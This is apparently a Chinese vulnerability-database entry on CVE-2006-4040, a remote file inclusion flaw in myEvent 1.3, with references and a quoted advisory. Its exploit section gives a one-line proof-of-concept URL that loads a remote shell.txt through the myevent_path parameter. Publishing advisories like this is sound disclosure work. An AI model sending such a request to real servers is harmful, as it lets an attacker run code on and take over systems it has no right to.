myEvent 'Myevent.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110714 漏洞类型 输入验证
发布时间 2006-07-31 更新时间 2006-08-14
CVE编号 CVE-2006-4040 CNNVD-ID CNNVD-200608-130
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28311
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-130
|漏洞详情
myWeblandmyEvent1.3及早期版本的myevent.php脚本中存在PHP远程文件包含漏洞,远程攻击者可借助myevent_path参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19246/info

myEvent is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

http://www.example.com/myevent.php?myevent_path=http://www.example.com/shell.txt?
|参考资料

来源:VUPEN
名称:ADV-2006-1384
链接:http://www.frsirt.com/english/advisories/2006/1384
来源:BID
名称:19246
链接:http://www.securityfocus.com/bid/19246
来源:MILW0RM
名称:2093
链接:http://www.milw0rm.com/exploits/2093
来源:SECUNIA
名称:19680
链接:http://secunia.com/advisories/19680
来源:XF
名称:myevent-myevent-file-include(28347)
链接:http://xforce.iss.net/xforce/xfdb/28347
来源:OSVDB
名称:24725
链接:http://www.osvdb.org/24725
来源:MILW0RM
名称:2093
链接:http://milw0rm.com/exploits/2093